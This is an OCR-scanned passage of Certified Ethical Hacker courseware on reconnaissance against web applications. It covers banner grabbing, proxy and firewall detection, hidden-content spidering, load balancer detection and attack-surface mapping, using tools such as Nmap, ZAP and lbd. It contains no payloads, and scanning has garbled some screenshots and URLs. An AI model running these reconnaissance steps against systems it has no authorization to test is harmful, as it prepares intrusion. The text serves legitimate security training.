WebScarab, and Mozenda Web t he content and functionality it
Agent Builder for web discovers https://www.zoproxy.org
spidering/crawling

Copynght Cl by fC·CIUDCil All Rights Reserved Reproduction ts Strictly Proh1b1ted

Module 14 Page 1993 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Footprint Web Infrastructure: Detect Load Balancers

Organi zat ions use load balancers to distribute web server load on multiple servers and increase t he productivity and
reliabi lity of we b applications
Attackers use various tools such as dig, loa d bala ncing detector (l bd), and Halberd to detect load balancers and t hei r
real IP addresses

load balancing detector (lbd)

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Footprint Web Infrastructure

Footprinting is the process of gathering complete information about a system and all its related
components, as well as how they work. The web infrastructure of a web application is the
arrangement by which it connects to other systems, servers, and so on in the network. Web
infrastructure footprinting is the first step in web application hacking; it helps attackers to
select victims and identify vulnerable web applications. Attackers footprint the web
infrastructure to know how the web application connects with its peers and the technologies it
uses and to find vulnerabilities in specific parts of the web application architecture. These
vulnerabilities can help attackers exploit and gain unauthorized access to the web application.
Footprinting the web infrastructure allows an attacker to engage in the following tasks:
■ Server Discovery: Attackers attempt to discover the physical servers that host web
applications, using techniques such as Whois lookup, DNS interrogation, port scanning,
and so on .
■ Service Discovery: Attackers can discover t he services running on web servers to
determine whether they can use some of them as attack paths fo r hacking the web
application . This procedure also provides web application information such as storage
location, information about the machines running the services, and the network usage
and protocols involved. Attackers can use tools such as Nmap, NetScanTools Pro, and
others to find services running on open ports and exploit them .
■ Server Identification: Attackers use banner grabbing to obtain the server banners,
which help to identify the make and version of the web server software. Other
information th at this t echnique provides includes the following:
o Local Identity: information such as the location of the server and the Origin-Host .

Module 14 Page 1994 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Local Addresses: the local IP addresses that the server uses for sending Diameter
Capability Exchange messages (CER/CEA messages), including the server identity,
capabilities, and other information such as protocol version number and supported
Diameter applications.
o Self-Names: this field specifies all the realms that the server considers as local and
treats all the requests sent for them as no realm requests.
■ Hidden Content Discovery: Footprinting also allows attackers to extract content and
functionality that is not directly linked to or reachable from the main visible content.
■ Load Balancers Detection: Attackers can detect load balancers of the target
organization along with their real IP addresses to identify servers exposed over the
Internet.
Server Discovery

To footprint a web infrastructure, first, you need to discover active Internet servers. Three
techniques, namely Whois lookup, DNS interrogation, and port scanning, help in discovering the
active servers and their associated information.
■ Whois Lookup

Whois lookup tools allow you to gather information about a domain with the help of
DNS and Whois queries. They provide information about the IP address of the web
server and DNS names. These tools produce results in the form of an HTML report.
Use the following tools to perform Whois lookup:
o Netcraft (https://www.netcraft.com)
o WHOIS Lookup (https:j/whois.domaintools.com)
o SmartWhois (https://www.tamos.com)
o Batch IP Converter (http://www.sabsoft.com)
■ DNS Interrogation

Organizations use DNS interrogation, which is a distributed database, to connect their IP

addresses with their respective hostnames and vice versa. When the DNS is improperly
connected, then it is very easy to exploit it and gather the information required for
launching an attack on a target organization. It provides information about the location
and type of servers.
Use the following tools to perform DNS interrogation:
o DNS Records (https://network-tools.com)
o DNSRecon (https://github.com)
o Domain Dossier (https://centralops.net)
o DNSdumpster.com (https://dnsdumpster.com)

Module 14 Page 1995 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Port Scanning
Port scanning is the process of scanning system ports to recognize open ones. It
attempts to connect to a particular set of TCP or UDP ports to find out the service that
exists on the server. If attackers recognize an unused open port, they can exploit it to
intrude into the system.
Use the following tools to perform port scanning:
o Nmap (https://nmap.org)
o NetScanTools Pro (https://www.netscantools.com)
o Advanced Port Scanner (https://www.advanced-port-scanner.com)
o Hping (http://www.hping.org)
Note: For complete coverage of Whois lookup, DNS interrogation, and port scanning, refer to
Module 02: Footprinting and Reconnaissance as well as Module 03: Scanning Networks.

Service Discovery

Footprinting the web infrastructure provides data about the services offered, such as exchange
and encryption of data, path of transmission, and protocols deployed. Scan the target web
server to identify the common ports that it uses for different services. After finding these
services, attackers can compromise them to exploit the web infrastructure that runs the
application. The identified services act as attack paths for web application hacking. The table
below lists common ports used by web servers and their respective HTTP services:

Port Typical HTTP Services

80 World Wide Web standard port
81 Alternate WWW

88 Kerberos
384 Remote Network Server System
443 SSL (HTTPS)
514 Remote Shell
625 Open Directory Proxy (ODProxy)
657 IBM RMC (Remote monitoring and Control) Protocol
706 Secure Internet Live Conferencing (SILC)
832 NETCONF for SOAP over HTTPS
833 NETCONF for SOAP over BEEP
900 IBM WebSphere administration client
Remote HTTPS management for firewall devices running
981
embedded Check Point VPN-1 software
Microsoft Remote Web Workplace, a feature of Windows
987
Small Business Server

Module 14 Page 1996 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

1433 MSSQL Server

1434 MSSQL Monitor
1527 Oracle Net Services
2301 Compaq Insight Manager
2381 Compaq Insight Manager over SSL
2638 SQL Anywhere Database Server
4242 Microsoft Application Center Remote management
7001 BEA WebLogic
7002 BEA WebLogic over SSL
7070 Sun Java Web Server over SSL
8000 Alternate web server or web cache
8001 Alternate web server or management
8005 Apache Tomcat
9090 Sun Java Web Server admin module
10000 Netscape Administrator interface

Table 14.1: Table displaying HTTP Serv ices

■ Tools used for service discovery

o Nmap

Source: https://nmap.org
Nmap is a multi-platform, multi-purpose application used to perform footprinting of
ports, services, operating systems, etc. It is used for network discovery and security
auditing. It is useful for tasks such as network inventory, managing service upgrade
schedules, and monitoring host or service uptime.

I' - -
-
Zenmap D X
Sqn Iools Erofile !::!elp

Target 22,25,80,3389 google.com ... Profi le: L ... , Scan Cancel

Command: [ nmap-T4-A-v -P E -PS-PA 22,25,80,3389 google.com 7

I Hosts Services Nmap Output Ports / Hosts Topology Host Details Scans
◄ Port • Protocol ◄ State ◄ Service ◄ Version ◄
05 ◄ Host

••
google.com (142.2'. 80 tcp open http gws
113 tcp closed ident

• 443 tcp open https gws

◄
•• 2000
5060
tcp
tcp
open
open
cisco-sccp
sip
Filter Hosts

-
,_
- -

Figure 14.44 : Screenshot of Nmap

Module 14 Page 1997 Ethical Hacking a nd Counte rmeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Some additional service discovery tools are as follows:

o NetScanTools Pro (https://www.netscantools.com)
o Sandcat Browser (https://www.syhunt.com)
Server Identification/Banner Grabbing

Banner grabbing is a footprinting technique used by a hacker to obtain sensitive information

about a target. An attacker establishes a connection with the target and sends a pseudo-
request to it. The target then replies to the request with a banner message that contains
sensitive information required by the attacker to further penetrate the target.
Through banner grabbing, attackers identify the name and/or version of a server, operating
system, or application. They analyze the server response header field to identify the make,
model, and version of the web server software. This information helps them to select the
appropriate exploits from vulnerability databases to attack the web server and its applications.
How an attacker can use telnet to establish a connection and gain banner information of a
target is demonstrated below:
• The attacker issues the command telnet moviescope. com 80 in his/her
machine's command prompt to establish a telnet connection with the target machine.
Note: The attacker can specify either the IP address of a target machine or the URL of a
website. In both cases, the attacker obtains banner information of the target. In other
words, if the attacker entered an IP address, he/she receives banner information of the
target machine; if he/she enters the URL of a website, he/she receives banner
information of the web server that hosts the website.
Syntax: C: \ telnet <Website domain or IP address> 80

@I! 1 I I Ii t
. -. . . .
#
. .
' : : . . '. '

Figure 14.45: An example of telnet command usage

• After establishing the connection, the attacker receives the prompt: does not display
any information .

• Now, the attacker will press the Esc key, which returns the banner message that displays
information about the target server along with some miscellaneous information.

Module 14 Page 1998 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

-Type: text/html
d1f1ed : Wed, 15 Apr 2828 86 : 15:83 GMT
-Ranges : bytes ---------..
•2a415933edl2d61 :8" Server identified
: Microsoft-IIS/18 .8 as Microsoft-US
red-By: ASP.NET
Tue, 19 Apr 2822 85 :38 :24 GMT
· ose
: 783

Figure 14.46: Result of t elnet banner grabbing

■ This information helps attackers find ways to exploit target web servers and their
applications.
o Grabbing Banners from SSL Services
Tools such as Telnet and Netcat are capable of grabbing banners of web servers over
only an HTTP connection. Attackers cannot grab banners over an SSL connection using
the same techniques as those used for grabbing banners over HTTP connections. They
can use tools such as OpenSSL to grab banners on web servers over an encrypted
(HTTPS/SSL) connection.
Attackers perform the following steps to grab banners over an SSL connection:
o Step 1: Install OpenSSL
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL) and
Transport Layer Security (TLS) network protocols and the related cryptography
standards required by them.
It is available at https://www.openssl.org.
o Step 2: Navigate to OpenSSL in the terminal
o Step 3: Run the command : s _ client -host <target website> -port 443.
Replace th e <target website> with your target's domain name. Here, 443 is the
default SSL port.

Figure 14.47: Exam ple of OpenSSL comm and

Module 14 Page 1999 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Step 4: Type GET/HTTP/1.0 and press enter to get the server information.

The information displayed indicates that OpenSSL identifies the server used by
certifiedhacker.com as Apache.

Figure 14.48: Result of OpenSSL banner grabbing

Some additional banner grabbing tools are as follows:

■ Netcat (http://netcat.sourceforge.net)
■ ID Serve (https://www.grc.com)
■ Netcraft (https://www.netcraft.com)
Detecting Web App Firewalls and Proxies on Target Site

While footprinting the web infrastructure, attackers must discover the web application firewall
and proxy settings of the target site to know the security measures employed.
■ Detecting Proxies

Some organizations use proxy servers in front of their web servers to make them
untraceable. Therefore, when attackers try to trace the target's IP address, which is
hidden behind a proxy, using footprinting techniques, the attempt would provide its
proxy IP address and not its legitimate address.
Determine whether your target site is routing your requests through proxy servers. To
know whether a web server is behind a proxy, attackers can use the tra ce command.
The trace command sends a request to the web server, asking it to send back the
request. Attackers place the trace command in HTTP/1.1. If the web server is present
behind a proxy server and when an attacker sends a request using the trace command,
the proxy modifies this request (by adding some headers) and forwards it to the target
web server. Therefore, when the web server bounces back the request to the attacker's
machine, the attacker compares both requests and analyzes the changes made to it by
the proxy server.

Module 14 Page 2000 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

11
Via : 11 ,
11
X-Fo rwarded-For : 11 , "Pro xy -Co nnect ion : 11
TRACE / HTTP/ 1. 1
Host : www . test .com
HTTP/ 1.1 300 OK
Server : Mi crosof t -IIS/1 0. 0
Date : Sat , 23 Apr 2022 15 :25 : 15 GMT
Conte nt-le ngth : 40
TRACE / HTTP/ 1.1
Ho st : www . test . c om
Via : 1 . 1 1 92. 168. 11 . 15

Figure 14.49: Result of TRACE command

■ Detecting Web Application Firewalls

Web application firewalls (WAFs) are security devices deployed between the client and
the server. These devices are like IPS that provide security for web applications against a
wide range of attacks. They monitor web server traffic and block malicious traffic, thus
safeguarding web applications from attacks.
Attackers use different techniques to detect web application firewalls in the web
infrastructure. One of these techniques involves examining the cookies because a few
WAFs add their own cookies during client-server communication. Attackers can view the
HTTP request cookie to observe the presence of a WAF.
Another method for detecting a WAF is by analyzing the HTTP header request. Most
firewalls edit HTTP header requests; thus, the server response varies. Hence, an attacker
sends a request to a web server, and when the server responds to the request, the
response betrays the presence of the web application firewall.
Attackers use various tools such as WAFW00F to detect the presence of a WAF in front
of a web server that hosts the target website.
o WAFW00F
Source: https://github.com
WAFW00F allows one to identify and fingerprint WAFs protecting a website. It
detects a WAF at any domain by looking for the following:

• Cookies • Drop action

• Server cloaking • Pre-built-in rules

• Response codes

Module 14 Page 2001 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Figure 14.50: Screenshot of WAFW00 F

You can also use the tools listed below to detect WAFs in the target web infrastructure:
o SHIELDFY Web Application Firewall Detector (https://shieldfy.io)
o WhatWaf (https://github.com)
o Nmap (https://nmap.org)
Hidden Content Discovery

Hidden content and functionality not reachable from the main visible content can be
discovered to exploit user privileges within the application. This allows an attacker to recover
backup copies of live files, configuration files, and log files containing sensitive data, backup
archives containing snapshots of files within the web root, new functionality that is not linked
to the main application, etc.
The following methods are employed for discovering the hidden content:
• Web Spidering/Crawling

Web spiders/crawlers automatically discover the hidden content and funct ionality by
parsing HTML forms and client-side JavaScript requests and respon ses.
o OWASP Zed Attack Proxy

Source: https://www.zaproxy.org
OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding
vulnerabilities in web applications. It offers automated scanners as well as a set of
tools that allow you to find security vulnerabilities manually. Attackers use OWASP
ZAP for web spidering/crawling to identify hidden content and functionality in the
t arget web application.

Module 14 Page 2002 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

File Edit View Analyse Report Tools Import Online Help

-------
Standard Mode V ' liiil id r WI D m □ ID
~ ....l ._I! ,,, ID ';i g) X
Sites + ~ Quick St art ; -. Request <1- Response +
® O !D □
151 Contexts
Ill Default Context
< Automated Scan
Sites This screen allows you to launch an automated scan against an application - just
enter Its URL below and press 'Attack'.
Please be aware that you should only attack applicat ions that you have been
specifically been given permission to test.

URL to attack: htt p://www.moviescope.com Select..

Use traditional spider: ✓

i!l History ~ Search If'I Alerts ; I• Output ~ Spider ~ Active Scan +

,..®
_ e_ .;;._-"'
/ r#" - - - - - - - - - - - - - - , Full details of any selected alert will be displayed here.
v '-'Alerts (8)
You can manually add alerts by right clicking on the relevant line in t he history and
"' SQL Injection selecting 'Add alert'.
"' Viewstate without MAC Signature (Unsure) (3)
"' X-fram e-Options Header Not Set (3) You can also edit existing alerts by double clicking on t hem.
Ill Absence of Anti-CS RF Tokens (3)
I'll Server Leaks Information via "X-l'owered-By"
Ill X-AspNet -Version Response Header (3)
> "' X-Content-Type-Options Header Missing (16)
,. Information Disclosure - Suspicious Comments

Alerts ,. 2 Ill 1 P 4 ,. 1 Primary Proxy: localhost:8080 0

Figure 14.51: Screenshot of OWASP ZAP

Some additional web spidering/crawling tools are as follows:

o Burp Suite (https://portswigger.net)
o WebScarab (https://owasp.org)
o Mozenda Web Agent Builder (https://www.mozenda.com)
o Octoparse (https://www_octoparse.com)
o Giant Web Crawl (https://80/egs.com)
■ Attacker-Directed Spidering

The attacker accesses all of the application's functionality and uses an intercepting
proxy to monitor all requests and responses. The intercepting proxy parses all of the
application's responses and reports the content and functionality it discovers.
Attacker-directed spidering tools:
o OWASP Zed Attack Proxy (https://www.zaproxy.org)

Module 14 Page 2003 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Detect Load Balancers

Organizations use load balancers to distribute their web server load across multiple servers and
thus increase the productivity and reliability of web applications. In general, there are two
types of load balancers, namely DNS load balancers (layer 4 load balancers) and HTTP load
balancers (layer 7 load balancers) . Attackers use various tools such as dig, load balancing
detector (lbd), and Halberd, to detect load balancers of the target organization along with their
real IP addresses. For example, if a single host resolves to multiple IP addresses, then attackers
can determine that the target organization is using load balancers.
• Using host command

Type the following host command to determine whether the target domain is resolving
to multiple IP addresses:
host <target domain>

Figure 14.52: Screenshot showing output of host command

Module 14 Page 2004 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Using dig command

The dig command provides more detailed results than the host command. Type the
following dig command to determine whether the target domain is resolving to multiple
IP addresses:
dig <target domain>

Figure 14.53: Screenshot showing the output of dig command

Module 14 Page 2005 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Using load balancing detector {lbd)

Source: https://github.com
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP load
balancing via Server: and Date: header and diffs between server answers. It analyzes
data received from application responses to detect load balancers.
Type the following command to detect load balancers of the target web application:
lbd <target domain>

Figure 14.S4: Scree nshot showing t he output of lbd tool

After identifying the real IP addresses behind the load balancers, attackers perform further
attacks on th e target organization .

Module 14 Page 2006 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Analyze Web Applications

Analyze the active application's functionality and technologies to identify exposed attack surfaces

Identify Entry Points

Review the generated HTTP request to identify the user input entry points
for User Input

Identify Server- Fingerprint the technologies active on the server using various fingerprint techniques such as HTTP
Side Technologies fingerprinting

Identify Server-
Observe the applications revealed to the client to identify the server-side structure and functionality
Side Functionality

Identify Files
Identify misconfigured web applications that expose critical files and directories over the Internet
and Directories

Identify Web Application

Identify exploitable vulnerabilities in the underlying web technologies
Vulnerabilities

Map the Attack

Identif y the various attack surfaces uncovered by the applications an d their associated vulnerabilities
Surface

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Analyze Web Applications: Identify Entry Points for User Input

Exa mine UR L, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields

l Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent,
Referer, Accept, Accept-Language, and Host headers

Determine URL encoding techniques and other encryption measures implemented for secure web traffic
such as SSL

Tools used

e Burp Suite (https;//portswigger.net) 9 WebScarab (https;//owosp.org)

e OWASP Zed Attack Proxy (https;//www.zoproxy.org) 9 httprint (https;//www.net-squore.com)

f Copynght C) by fC-Cluntil All Rights Reseived Reproduction IS Stnctly Proh1b1ted

Module 14 Page 2007 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Analyze Web Applications: Identify Server-Side Technologies

Q t,ttp,,,c...,,,_OJ01
Perform a detailed server fingerprinting, analyze HTTP headers and HTM L source
code to identify server·side technologies ~ :........~ l l : , J l.......~ 1 ~ 1 1 ( ~ ~ ~:...
S~ f'llt
Examine URLs for file extensions, directories, and other identifica tion information
Examine the error page messages 1~12!1Hl rnml■
~ )11!10
Examine session tokens:JSESSIONI D -Java, ASPSESSIONID - 115 server,
ASP. NET_Sessionld • ASP.NET, PHPSESSID-PHP
Use tools such as httprint and WhatWebto identifyserver·side technologies

G@~ U7'E4Bllt1 l OOCS

SlllC,DCSI JIC,DCS
l3,£D3CZ,Sll 1c,ocs
s,mJC29512CB9l)

tJ Oops! [D...!...J
Server Error in '/ReportServer' Application.
Could not find the permission set named 'ASP.Net'. https://www.net-square.com
Descripti on: An unhanded exception oc.cl.l"redduri~ the
execution of the ctxrent web request Please review the stack
t race for more information abou t the error and where it
originated in the code.

Version Information: Microsoft .Net Framewor k version

4.0.303 19; A.SP.Net Version 4.0.30319.1

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Analyze Web Applications: Identify Server-Side Functionality

Examine page source information and U RLs and

make an educated guess to determine the internal
structure and functionality of web applications

GNUWget https://www.gnu.org
Tools
curl https://curl.se
used
BlackWidow http://softbytelabs.com

https;//www.gnu.org
SSL ASPX Platform
;,. ;,.
Examine https .//www.certifiedhacker . com/cus tomers . aspx)name=exi s ting%20clients &isActive=
URL O&startDate=20%2F11 %2F2020&endDate=20 %2F04 %2F2022&showBy=name

...
'·······························> Database Column <·································'
COpynght Cl by EC-C1uncil All Rights Reserved Reproduction IS Strictly Proh1b1ted

Module 14 Page 2008 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Analyze Web Applications: Identify Files and Directories

Attackers use tools such as Go buster or Nmap NSE script http-en um to enumerate applications, as well as
hidden directories and files of the web application hosted on the web server, that are exposed on the
Internet

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Analyze Web Applications: Identify Web Application

Vulnerabilities
Attackers use various techniques to detect vulnerabilities in target
Vega helps you to find and validate SQL
web applications hosted on web servers either to gain administrator
injection, Cross-Site Scripting (XSS),
level access to the server or to retrieve sensitive information stored Ve ga
inadvertently disclosed sensitive
on the server
information, and other vulnerabil it ies
Comprehensive vulnerability scanning can disclose security flaws
associated with executables, binaries, and technologies used in a
web application
e- .11 .....
Attackers can use tools such as Vega to the vulnerabilities of target
web applications 8VEGA
_...._,s..mma.,,
Web Application Scanning Tools (!) k M -
a - -..•-
. 0 111
-l'~
Cl

e WPScan Vulnerability Database {https://wpscan.com)

e Arachni (https://www.orachni-scanner.com)
t!I appspider (https://www.rapidl.com)
https://www.subgraph.com
e Uniscan (https://saurcefarge.net)

COpynght Cl by EC-C1uncil All Rights Reserved Reproduction IS Strictly Prohibited

Module 14 Page 2009 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Analyze Web Applications: Map the Attack Surface

Information Attack

Oient-Side validation Injection Attack, Authentication Attack Injection Attack Privilege Escalation, Access Controls

Database Interaction SQL Injection, Data Leakage Cleartext Communication Data Theft, Session Hijacking

File Upload and Download Directory Traversal Error Message Information Leakage

Display of User-Supplied Data Cross-Site Scripting Email Interaction Email Injection

Dynamic Redirects Redirection, Header Injection Application Codes Buffer overflows

Username EnumeratK>n, Password

Login Third-Party Application Known Vulnerabilities Exploitation
Brute-Force

Session State Session Hijacking, Session Fixation Web Server Software Known Vulnerabilities Exploitation

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Analyze Web Applications

Once attackers have attempted various possible attacks on a vulnerable web server, they may
turn their attention to the web application itself. To hack the web application, first, they may
need to analyze it to determine its vulnerable areas. Even if it has only a single vulnerability,
attackers try to compromise its security by launching an appropriate attack. This section
describes how attackers find vulnerabilities in a web application and exploit them .
Attackers need to analyze target web applications to determine their vulnerabilities. Doing so
helps them reduce the "attack surface." To analyze a web application, attackers acquire basic
knowledge of the web application . Then, they can analyze the active application's functionality
and technologies to identify any exposed attack surfaces.
■ Identify Entry Points for User Input: The first step in analyzing a web application is to
check for the application entry point, which can later serve as a gateway for attacks.
One of the entry points includes the front-end web application that intercepts HTTP
requests. Other web application entry points are user interfaces provided by web pages,
service interfaces provided by web services, serviced components, and .NET Remoting
components.
Attackers should review the generated HTTP request to identify the user input entry
points.
■ Identify Server-Side Technologies: Server-side technologies or server-side scripting
systems are used to generate dynamic web pages requested by clients, and they are
stored internally on the server. The server allows the running of interactive web pages
or websites on web browsers.

Module 14 Page 2010 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Commonly used server-side technologies include Active Server Pages (ASP), ASP.NET,
ColdFusion, JavaServer Pages (JSP), PHP, Python, and Ruby on Rails.
Attackers can fingerprint the technologies active on the server using various fingerprint
techniques such as HTTP fingerprinting.
• Identify Server-Side Functionality: Server-side functionality refers to the ability of a
server to execute programs on output web pages. User requests stimulate the scripts
residing on the web server to display interactive web pages or websites. The server
executes server-side scripts, which are invisible to the user.
Attackers should evaluate the server-side structure and functionality by keenly
observing the applications revealed to the client.
• Identify Files and Directories: Web servers host web applications, and
misconfigurations while hosting these web applications may lead to exposure of critical
files and directories over the Internet. Attackers identify the target web application's
files and directories exposed on the Internet using various automated tools such as
Gobuster. Such information further helps attackers gather sensitive information stored
in the files and folders.
■ Identify Web Application Vulnerabilities: Web applications are developed using various
technologies and platforms. Not following secure coding practices in the development
of web applications may leave flaws that can be exploited to perform various types of
attacks.
• Map the Attack Surface : Attackers then map the attack surface of the web application
to target specific vulnerable areas. They identify the various attack surfaces uncovered
by the applications as well as the vulnerabilities associated with them.
Identify Entry Points for User Input
Web application input gates help attackers launch various types of injection attacks on the
application. If such input gates are vulnerable to attacks, gaining access to the application is
easy. Thus, during web application analysis, attackers try to identify entry points for user input
so that they can understand how the web application accepts or handles the user input.
Attackers examine the URL, HTTP header, query string parameters, POST data, and cookies to
determine all the user input fields. They also identify HTTP header parameters that can be
processed by the application as user inputs, such as User-Agent, Referer, Accept, Accept-
Language, and Host. Furthermore, they determine URL encoding techniques and other
encryption measures implemented to secure web traffic, such as SSL. Then, they can find the
vulnerabilities present in the input mechanism and exploit them to gain access to the web
application.
Use the following tools to analyze the web application :
■ Burp Suite (https://portswigger.net)
• WebScarab (https://owasp.org)
• OWASP Zed Attack Proxy (https://www.zaproxy.org)
■ httprint (https://www.net-square.com)

Module 14 Page 2011 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Identify Server-Side Technologies

• Perform detailed server fingerprinting and analyze the HTTP headers and HTML source
code to identify server-side technologies
• Examine URLs for file extensions, directories, and other identification information

• Examine the error page messages

• Examine session tokens: JSESSIONID Java, ASPSESSIONID 115 server,
ASP.NET_Sessionld -ASP.NET, PHPSESSID- PHP

■ Use tools such as httprint and WhatWeb to identify server-side technologies

Server Error in '/ReportServer' Application.

Could not find the permission set named 'ASP.Net'.
Description: An unhanded exception occu r red during t he
execution of the current web request. Please review the stack
trace for more information about the error and where it
originated in the code.

Version Information: Microsoft .Net Framework Version

4.0.30319; ASP.Net Version 4.0.30319.1

Figure 14.55: Screenshot displaying error message

Module 14 Page 2012 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Ethical Hacker
Hacking Web Applications

■ httprint
Source: https://www.net-square.com
httprint is a web server fingerprinting tool that relies on web server characteristics to
accurately identify web servers, even though they may have been obfuscated by
changing the server banner strings or by plug-ins such as mod_security or server mask.
httprint can also be used to detect web-enabled devices that do not have a server
banner string, such as wireless access points, routers, switches, cable modems, and
httprint uses text signature strings, and it is very easy to add signatures to the signature
database.

l,;l httpnnt vcn,on OJOI X

lrcM F'lo
l u-' l (";t,d
lc:\IJ tets\Mnruw~a\D~ktop\h"ti:>r~301 \ w ~ b i t ~~ ("' nmap

le\IJNft \AanMi1a1«\0esl.top\1'11pm1_301\wnl2\tq,a11.1a b.l ~

n91nx/l 19 10
9E431BC86£03C29S81 1C9DCS81 1C9DCS811C90CSSOSFCFE84276E4BB811C9DCS
OD764SBS811C9DCS81 1C90CSCD37 187C811C90CS811C90CS811C9DCS81 1C9DCS
E2CE6927E2C£692JE2CE692381LC90CSE2CE69270SOCS0336ED3C29S81 1C90CS
6ED3C295E2CE69272A200B4CE2CE6923E2CE69236ED3C2956ED3C295E2CE6923
E2CE69236ED3C29S811C90CSE2CE6927E2CE6927
Apache/2 0 x 91 54 82 ,.
Apache/1 3 26 8S 42 67
lpache/ 1 3 27: 8 4 40 84
Apoch~/l 3 ( 4- 24] 83 39 OS y

jC \IJ•t \Aannt:uat«\Oetk.top\l'(tpm1_301\wn'.32\h'lprl'llwp,t
□I
~
r. csv
<"' ttrrl <"' )ITT
Clea1AJI ! Optrm
j

httpnnt hu bttn completed- < >

Figure 14.56: Screenshot of httprint

Module 14 Page 2013 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ WhatWeb

Source: https://github.com
WhatWeb scans and identifies web technologies, including content management
systems {CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web
servers, and embedded devices. WhatWeb has over 1800 plugins, each of which
recognizes something different. WhatWeb also identifies version numbers, email
